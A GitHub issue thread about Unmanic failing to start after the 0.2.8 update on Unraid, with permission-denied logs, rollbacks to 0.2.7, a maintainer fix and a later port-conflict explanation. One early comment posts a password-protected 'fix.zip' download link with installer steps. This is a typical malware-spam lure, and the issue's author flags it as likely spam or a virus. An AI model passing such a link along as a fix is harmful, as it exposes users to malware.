### ISSUE TITLE
Unmanic wont connect after todays upgrade

### ISSUE THREAD

**Issue by AngusMcKinnon** [Unmanic/unmanic#498]
Using Unraid 6.12.13

Upgraded to latest version of Unmanic (today - Aug 29 release). Has been previously working well for 3 months or more.

Looks like it is started okay (eg green arrow in unraid), but when I try and open the GUI for Unmanic I get

This site can’t be reached
192.168.0.143 refused to connect.

When I look in logs I see:

s6-supervise unmanic: warning: unable to spawn ./run (waiting 60 seconds): Permission denied
/package/admin/s6-overlay-3.1.6.2/etc/s6-rc/scripts/cont-init: 20: /etc/cont-init.d/20-config: Permission denied
/package/admin/s6-overlay-3.1.6.2/etc/s6-rc/scripts/cont-init: 20: /etc/cont-init.d/30-patch-nvidia: Permission denied
/package/admin/s6-overlay-3.1.6.2/etc/s6-rc/scripts/cont-init: 20: /etc/cont-init.d/60-custom-setup-script: Permission denied
s6-supervise unmanic: warning: unable to spawn ./run (waiting 60 seconds): Permission denied
s6-supervise unmanic: warning: unable to spawn ./run (waiting 60 seconds): Permission denied
s6-supervise unmanic: warning: unable to spawn ./run (waiting 60 seconds): Permission denied

Is this a problem at my end the upgrade has uncovered? or is it something with the upgrade that isnt right?

Ive googled and couldnt see any similar issues.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zulcon** [comment]
I rolled back to 0.2.7 in Docker and everything is working as normal for me, not sure what that link above is supposed to accomplish.

**Comment by AngusMcKinnon** [comment]
> I rolled back to 0.2.7 in Docker and everything is working as normal for me, not sure what that link above is supposed to accomplish.

Can I confirm you had same issue? If so, good news, means I dont have to fix anything my end.

I assume link above was spam or virus. Seemed to be pasted as soon as I hit the comment button so I ignored it.

**Comment by IOwnCalculus** [comment]
I just encountered the same issue, and rolled it back to 0.2.7 with success as well.  Definitely something went wrong with the 0.2.8 update.

**Comment by iloveteaandcoffee** [comment]
Same as being reported. No longer starts on the latest version

**Comment by shanelord01** [comment]
Sam issue. Is there an easy way to roll back on Unraid?

**Comment by iloveteaandcoffee** [comment]
> Same issue. Edited unmanic in unraid, changed "Repository" to "josh5/unmanic:0.2.7" and rollback complete. Now working again.

Replace the below in the repository and it will roll back to the previous version.

josh5/unmanic:0.2.7

![image](https://github.com/user-attachments/assets/42a7c6d4-6005-4481-b1ac-1cf59458e57d)

**Comment by maxvaneck** [comment]
same here. something definitely went wrong somewhere

**Comment by Josh5** [comment]
Should now be resolved

**Comment by AngusMcKinnon** [comment]
> Should now be resolved

Thanks @Josh5 You have an awesome product. Very much appreciated.

**Comment by shanelord01** [comment]
Sorry to comment on a closed thread, but I reverted to the latest branch from forced 0.2.7, and the issue still exists for me.

**Comment by lfilho** [comment]
I just pulled the latest image from today (2024-11-20) and i can't connect as well.

Docker compose:

```
  unmanic:
    container_name: unmanic
    image: josh5/unmanic:latest
    restart: unless-stopped
    network_mode: host
    security_opt:
      - no-new-privileges:true
    logging:
      driver: json-file
    ports:
      - 8889:8889
    environment:
      - PUID=$PUID
      - PGID=$PGID
      - UMASK=$UMASK
      - TZ=$TZ
    volumes:
      - $VOLUME_PREFIX/docker/unmanic:/config
      - $VOLUME_PREFIX/data/media:/library
      - $VOLUME_PREFIX/docker/tmp:/tmp/unmanic
    devices:
      - /dev/dri:/dev/dri
```

**Comment by lfilho** [comment]
I think I found the problem: even though i was changing the port in the my configuration file, looks like unmanic wasn't respecting and it was still trying to use `8888` and failing, since another container was already using that one. I changed the other container's port to something and reverted unmanic back to 8888 and it worked. It would be nice to have the port passed via docker-compose.yml to be respected 😊

Thank you for your work, @Josh5
